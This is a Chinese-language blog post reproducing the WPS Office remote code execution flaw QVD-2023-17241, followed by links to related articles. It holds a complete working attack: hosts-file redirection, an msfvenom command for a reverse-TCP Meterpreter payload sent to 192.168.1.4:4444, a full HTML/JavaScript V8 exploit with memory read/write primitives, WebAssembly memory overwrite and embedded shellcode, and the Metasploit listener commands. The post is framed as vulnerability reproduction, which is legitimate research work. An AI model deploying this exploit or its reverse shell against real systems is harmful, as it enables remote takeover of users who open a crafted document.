WPS Office 代码执行漏洞(QVD-2023-17241)

已于 2023-08-14 20:02:19 修改
阅读量1.1k 收藏 6
点赞数
分类专栏: poc 文章标签: wps
于 2023-08-12 15:12:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/h1825819493/article/details/132248304
版权

目录

 

本地利用弹计算器(自娱自乐)

原理分析

msf的利用

1.修改win11中的hosts文件

2.MSF生成一个C#后门

3.shellcode替换

 4.在创建html的目录,用python打开http服务来捕获请求

5.开启监听

6.在win11中点击poc文档,可以看到kali中捕获的对1.html请求

7. 看到msf进入后渗透模块,攻击完成

 

本地利用弹计算器(自娱自乐)

修改本地hosts文件(在我的win11真实机失败了,在虚拟机中实验成功)

修改hosts文件

127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn

在1.html的目录中用python打开http,用看来捕获请求

python -m http.server 80

 然后直接在点开poc文档(放在顶部资源中)就可以弹计算器了。

 

原理分析

打开\word\webExtensions\webExtensions1.xml,可以看到

e704dc4a388344e2abadd5331a68fd6c.png

 7272caccda9a45a8ba0448db8fd31d44.png

 可以看到XML标签<wpswe:url></wpswe:url>中定义了访问的文件地址。docx文档中嵌入一个远程链接,当使用wps去打开文档时会去请求这个链接,由于WPS内部浏览器存在漏洞,会调用系统的api去执行攻击者在html中构造的恶意代码从而导致RCE。

 

msf的利用

1.修改win11中的hosts文件

192.168.1.4 clientweb.docer.wps.cn.cloudwps.cn

2.MSF生成一个C#后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 -f csharp > shellcode.c

3.shellcode替换

在kali中创建一个1.html文件,替换掉shellcode的变量(如果不成功的话,点击poc文档仍然弹出计算器的话,可以卸载掉wps重新进行安装。WPS中还存有删除shellcode变量之前的1.html文件的缓存,所以不需要请求网址中的1.html,依旧可以执行弹出计算器的命令)

5fd6a5d2065b4a33ac8c1620fba545c0.png

1.html源码(修改完shellcode)

<script>
if(typeof alert === "undefined"){
    alert = console.log;
}

let f64 = new Float64Array(1);
let u32 = new Uint32Array(f64.buffer);

function d2u(v) {
    f64[0] = v;
    return u32;
}
function u2d(lo, hi) {
    u32[0] = lo;
    u32[1] = hi;
    return f64[0];
}

function gc(){ // major
    for (let i = 0; i < 0x10; i++) {
        new Array(0x100000);
    }
}

function foo(bug) {
    function C(z) {
        Error.prepareStackTrace = function(t, B) {
            return B[z].getThis();
        };
        let p = Error().stack;
        Error.prepareStackTrace = null;
        return p;
    }
    function J() {}
    var optim = false;
    var opt = new Function(
        'a', 'b', 'c',
        'if(typeof a===\'number\'){if(a>2){for(var i=0;i<100;i++);return;}b.d(a,b,1);return}' +
        'g++;'.repeat(70));
    var e = null;
    J.prototype.d = new Function(
        'a', 'b', '"use strict";b.a.call(arguments,b);return arguments[a];');
    J.prototype.a = new Function('a', 'a.b(0,a)');
    J.prototype.b = new Function(
        'a', 'b',
        'b.c();if(a){' +
        'g++;'.repeat(70) + '}');
    J.prototype.c = function() {
        if (optim) {
            var z = C(3);
            var p = C(3);
            z[0] = 0;
            e = {M: z, C: p};
        }
    };
    var a = new J();
    // jit optim
    if (bug) {
        for (var V = 0; 1E4 > V; V++) {
            opt(0 == V % 4 ? 1 : 4, a, 1);
        }
    }
    optim = true;
    opt(1, a, 1);
    return e;
}

e1 = foo(false);
e2 = foo(true);

delete e2.M[0];

let hole = e2.C[0];
let map = new Map();
map.set('asd', 8);
map.set(hole, 0x8);

map.delete(hole);
map.delete(hole);
map.delete("asd");

map.set(0x20, "aaaa");
let arr3 = new Array(0);
let arr4 = new Array(0);
let arr5 = new Array(1);
let oob_array = [];
oob_array.push(1.1);
map.set("1", -1);

let obj_array = {
    m: 1337, target: gc
};

let ab = new ArrayBuffer(1337);
let object_idx = undefined;
let object_idx_flag = undefined;

let max_size = 0x1000;
for (let i = 0; i < max_size; i++) {
    if (d2u(oob_array[i])[0] === 0xa72) {
        object_idx = i;
        object_idx_flag = 1;
        break;
    }if (d2u(oob_array[i])[1] === 0xa72) {
        object_idx = i + 1;
        object_idx_flag = 0;
        break;
    }
}

function addrof(obj_para) {
    obj_array.target = obj_para;
    let addr = d2u(oob_array[object_idx])[object_idx_flag] - 1;
    obj_array.target = gc;
    return addr;
}

function fakeobj(addr) {
    let r8 = d2u(oob_array[object_idx]);
    if (object_idx_flag === 0) {
        oob_array[object_idx] = u2d(addr, r8[1]);
    }else {
        oob_array[object_idx] = u2d(r8[0], addr);
    }
    return obj_array.target;
}

let bk_idx = undefined;
let bk_idx_flag = undefined;
for (let i = 0; i < max_size; i++) {
    if (d2u(oob_array[i])[0] === 1337) {
        bk_idx = i;
        bk_idx_flag = 1;
        break;
    }if (d2u(oob_array[i])[1] === 1337) {
        bk_idx = i + 1;
        bk_idx_flag = 0;
        break;
    }
}

let dv = new DataView(ab);
function get_32(addr) {
    let r8 = d2u(oob_array[bk_idx]);
    if (bk_idx_flag === 0) {
        oob_array[bk_idx] = u2d(addr, r8[1]);
    } else {
        oob_array[bk_idx] = u2d(r8[0], addr);
    }
    let val = dv.getUint32(0, true);
    oob_array[bk_idx] = u2d(r8[0], r8[1]);
    return val;
}

function set_32(addr, val) {
    let r8 = d2u(oob_array[bk_idx]);
    if (bk_idx_flag === 0) {
        oob_array[bk_idx] = u2d(addr, r8[1]);
    } else {
        oob_array[bk_idx] = u2d(r8[0], addr);
    }
    dv.setUint32(0, val, true);
    oob_array[bk_idx] = u2d(r8[0], r8[1]);
}

function write8(addr, val) {
    let r8 = d2u(oob_array[bk_idx]);
    if (bk_idx_flag === 0) {
        oob_array[bk_idx] = u2d(addr, r8[1]);
    } else {
        oob_array[bk_idx] = u2d(r8[0], addr);
    }
    dv.setUint8(0, val);
}

let fake_length = get_32(addrof(oob_array)+12);
set_32(get_32(addrof(oob_array)+8)+4,fake_length);

let wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
let wasm_mod = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_mod);
let f = wasm_instance.exports.main;

let target_addr = addrof(wasm_instance)+0x40;
let rwx_mem = get_32(target_addr);
//alert("rwx_mem is"+rwx_mem.toString(16));

const shellcode = new Uint8Array([0xfc,0xe8,0x8f,0x00,0x00,0x00,
0x60,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,
0x14,0x89,0xe5,0x8b,0x72,0x28,0x31,0xff,0x0f,0xb7,0x4a,0x26,
0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,
0x01,0xc7,0x49,0x75,0xef,0x52,0x8b,0x52,0x10,0x57,0x8b,0x42,
0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x01,0xd0,
0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0x50,0x85,0xc9,0x74,
0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xac,
0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,
0x3b,0x7d,0x24,0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,
0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,
0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,
0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,
0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,
0x4c,0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,
0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,
0x6a,0x0a,0x68,0xc0,0xa8,0x01,0x04,0x68,0x02,0x00,0x11,0x5c,
0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,
0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,
0x75,0xec,0xe8,0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,
0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,
0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,
0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,
0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,
0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,
0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,
0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,
0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5
]);

for(let i=0;i<shellcode.length;i++){
    write8(rwx_mem+i,shellcode[i]);
}
f();
</script>

 4.在创建html的目录,用python打开http服务来捕获请求

python -m http.server 80

5.开启监听

msfconsolemsf6 > use exploit/multi/handlermsf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.1.4msf6 exploit(multi/handler) > set lport 4444msf6 exploit(multi/handler) > run

6.在win11中点击poc文档,可以看到kali中捕获的对1.html请求

6f9497c34451424aa4c1138f3ddde6d1.png

7. 看到msf进入后渗透模块,攻击完成

e56c8d04e078486090446e30396a45c0.png

 

 

漏洞复现】2023HVV WPS Office 远程代码执行漏洞(RCE)
李火火的安全圈
09-08 3440
Office中的WebExtension是一种用于扩展Microsoft Office功能的技术。Office插件使第三方开发者能够在Office应用程序中集成自己的服务和功能。这些插件采用跨平台的Web技术(如HTML,CSS和JavaScript)开发,可以在不同的平台和设备上运行。简单理解就是Office内置了一个浏览器,可以解析html/javascript/css代码,本次的漏洞,就是WPS在处理WebExtension时,未能正确的处理javascript代码,造成了溢出RCE。
WPS漏洞复现(不含漏洞分析)
qq_29616295的博客
08-11 1270
想搞明白这个漏洞的原理必须明白clientweb.docer.wps.cn.{xxxxx}wps.cn在WPS中究竟是如何调用的远程服务,怎么去修改docx中的相关模块(exp中有),和使用js执行calc的原理(在1.html中,不太懂js看不太懂),等工作结束了再详细分析(懂得都懂)
WPS技术浅谈:Wi-Fi WPS安全设置有漏洞
GiNeo的专栏
06-18 1963
原文:http://wireless.it168.com/a2012/0210/1309/000001309770.shtml WPS(Wi-FiProtected Setup,WiFi保护设置),它是由WiFi联盟组织实施的可选认证项目,它主要致力于简化无线网络设置及无线网络加密等工作。有了WPS“一键加密”,这个过程就变得异常简单了,我们只需按一下无线路由器上的WPS键,就能轻松快速地完成无
WPS Office RCE(QVD-2023-17241)漏洞复现上线CS
m0_70535581的博客
07-23 619
WPS Office RCE(QVD-2023-17241)漏洞复现并上线CS
WPS出现0day漏洞,升级保障安全,速速行动
didiplus
08-11 1709
近日,监测发现WPS Office for Windows版本 存在0day漏洞,攻击者可以利用该0day漏洞在受害者主机上执行任意恶意文件;目前已经发现了该Oday漏洞的在也利用。
wps 2012-2013 通杀漏洞(CVE-2013-3934)
weixin_30335353的博客
12-16 350
测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! #!/usr/bin/python # Exploit Title: Kingsoft Office Writer v2012 8.1.0.3385 .wps Buffer Overflow Exploit (SEH) # Version: 2012 8.1.0.3385 # Date: 2013-1...
Nacos身份绕过漏洞QVD-2023-6271)复现学习
cc123489ll的博客
06-06 1153
本文仅做复现,不做分析!其实就是默认keyshiro550exchange的jwt伪造等,都是类似的问题。Nacos是一个易于使用的平台,专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。目前Nacos身份认证绕过漏洞(),开源服务管理平台Nacos在默认配置下未对进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系统受控等后果。基本上都受到了影响,最新的版本已修复漏洞
Nacos身份绕过漏洞复现(QVD-2023-6271)
qq_42751192的博客
08-19 392
Nacos 是一个易于使用的平台,专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。
【高危】 WPS Office 存在代码执行漏洞
murphysec的博客
08-10 1550
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌云等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。产品可以极低成本的和现有开发流程中的各种工具一键打通,包括 IDE、Gitlab、Bitbucket、Jenkins、Harbor、Nexus 等数十种工具无缝集成。避免点击带有超链接的图片或对象。
WPS Office 漏洞复现
08-10 1728
WPS Office是金山软件公司开发的,中国领先的办公软件套件,包含文字、表格和演示三个组件,支持创建、编辑各种文档,并具有强大的数据计算、统计和分析功能。其特点包括全面支持PPT动画效果、支持文档编辑和阅读模式、支持共享播放和Airplay、DLNA播放PPT等。WPS Office还支持新建Excel文档、查看加密文档、筛选活动单元格所在行列、自由调整行高列宽等功能。
重大安全警告!WPS 两高危漏洞曝光,所有用户尽快升级
最新发布
民工哥的博客
08-20 416
戳下方名片,关注并星标!回复“1024”获取2TB学习资源!????体系化学习:运维工程师打怪升级进阶之路 4.0— 特色专栏—MySQL/PostgreSQL/MongoDBElasticSearch/Hadoop/RedisKubernetes/Docker/DevOpsKafka/RabbitMQ/Zookeeper监控平台/应用与服务/集群管理N...
关于WPS Office安全漏洞情况的通报
weixin_33713503的博客
09-04 808
本文讲的是关于WPS Office安全漏洞情况的通报,近日,国家信息安全漏洞库(CNNVD)收到关于WPS Office缓冲区错误漏洞的情况报送,并于第一时间与软件厂商“北京金山办公软件公司”进行了沟通。经金山公司确认,该漏洞存在。根据CNNVD相关规定,已对此漏洞进行收录,并分配编号CNNVD-201702-646。漏洞相关情况如下: 一、漏洞简介 ...
HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现
qq_53058639的博客
11-08 161
最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。
深入解析:WPS远程代码执行漏洞利用工具——安全研究者必备利器
gitblog_00031的博客
06-15 556
深入解析:WPS远程代码执行漏洞利用工具——安全研究者必备利器 去发现同类优质开源项目:https://gitcode.com/ 在安全研究领域,每当提及“0-day”漏洞,总能引发一阵波澜。今天,我们将深入探讨一个针对WPS Office的前沿安全工具——ba0gu0/wps-rce,它揭露了WPS Office2023年新发现漏洞,为安全研究人员提供了一种研究和防护此类威胁的有效途径。 项目...
WPS office 最新未公开 0Day漏洞警示
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
08-23 1891
0day 漏洞可以由黑客或攻击者利用来攻击他们的目标,可以通过不同的方式来实现,例如,攻击者可以利用远程漏洞攻击,通过恶意的网络链接或 e-mail 附件来攻击目标,或者利用本地漏洞攻击,在目标系统上安装木马程序或其他恶意程序。近日,网传监测发现WPS Office for Windows版本 存在0day漏洞,攻击者可以利用该0day漏洞在受害者主机上执行任意恶意文件,高危级别,官方尚未对此发布修复漏洞,目前建议只能临时弃用wps或者不要点开未知文件,尤其在线网络文件,中招概率极大。
WPS Office两个严重漏洞曝光,已被武器化且在野利用
FreeBuf_的博客
08-19 2749
WPS Office作为一款用户基数超过2亿的广泛使用的办公套件,被发现存在两个关键漏洞(CVE-2024-7262和CVE-2024-7263),这些漏洞可能导致用户遭受远程代码执行攻击。这两个漏洞的CVSS评分为9.3,表明它们的严重性很高,且易于被利用。其中CVE-2024-7262已经被武器化,ESET的安全研究人员发现它正在野外被积极利用。但也有圈内小道消息称,该漏洞只会影响国际版,国内版本不受影响。
qvd-2023-45061:doc view在线文档预览系统代码执行漏洞
12-14
qvd-2023-45061是一种在线文档预览系统的代码执行漏洞,该漏洞存在于系统的doc view组件中。通过利用该漏洞,攻击者可以执行恶意代码来获取系统权限或者进行其他恶意活动。 这个漏洞的原理是,当用户上传一个包含恶意代码的文档时,系统未能正确地验证和过滤文档内容,导致恶意代码能够被执行。恶意代码可以是任意的,包括执行命令、读取文件、修改系统设置等。 为了利用qvd-2023-45061漏洞,攻击者需要首先获得上传文档的权限。一旦成功上传恶意文档,攻击者可以通过访问文档的URL来触发代码执行。系统会无意识地将文档中的恶意代码当作合法的脚本执行,从而造成安全问题。 为了防止此类漏洞的发生,开发人员需要对用户上传的文档进行严格的验证和过滤操作。可以通过限制上传的文件类型、禁止执行特定的脚本命令等方式来增强系统的安全性。同时,及时更新系统组件、及时修复漏洞也是防范此类攻击的重要措施。 作为用户,我们也应该注意在使用在线文档预览系统时保持软件的更新,避免未知来源的文档上传,以及定期检查和删除已上传的文档,以减少被恶意利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

偷吃"游"的阿彪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值